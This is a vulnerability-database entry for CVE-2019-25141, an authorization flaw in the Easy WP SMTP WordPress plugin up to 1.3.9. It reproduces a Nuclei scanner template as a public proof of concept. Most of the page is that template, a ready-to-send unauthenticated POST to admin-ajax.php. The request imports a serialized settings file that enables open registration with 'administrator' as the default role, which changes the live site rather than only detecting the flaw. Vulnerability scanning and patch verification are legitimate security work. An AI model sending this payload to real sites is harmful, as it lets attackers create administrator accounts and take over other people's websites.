CVE-2019-25141: Easy WP SMTP <= 1.3.9 - Missing Authorization to Arbitrary Options Update

日期: 2025-08-01 | 影响软件: Easy WP SMTP | POC: 已公开

漏洞描述

The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts.

PoC代码[已公开]

id: CVE-2019-25141

info:
  name: Easy WP SMTP <= 1.3.9 - Missing Authorization to Arbitrary Options Update
  author: DhiyaneshDK
  severity: critical
  description: |
    The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/84b75f7d-7258-46f6-aee6-b96d70bee264?source=cve
    - https://medium.com/@ayman.abdul.kareem/from-bug-finder-to-risk-advisor-how-security-roles-are-evolving-db1aa86dd137
    - https://nvd.nist.gov/vuln/detail/CVE-2019-25141
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-25141
    cwe-id: CWE-862
    epss-score: 0.63236
    epss-percentile: 0.98349
    cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp-ecommerce
    product: easy_wp_smtp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/easy-wp-smtp/"
  tags: cve,cve2019,wordpress,wp-plugin,wp,file-upload,easy-wp-smtp,intrusive

variables:
  filename: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Connection: keep-alive

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="action"

        swpsmtp_clear_log
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="swpsmtp_import_settings"

        1
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="swpsmtp_import_settings_file"; filename="{{filename}}.txt"
        Content-Type: text/plain

        a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "options-general.php?page=swpsmtp_settings")'
        condition: and
# digest: 4b0a004830460221009b3410a9199e8a8387adf886d186c60701966d56597e14963b4bf6cd4e11262e02210089554a7667a5d6954c3a8bfe58c558153c53b001a47403383e2ef614beb6ec71:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-25141.yaml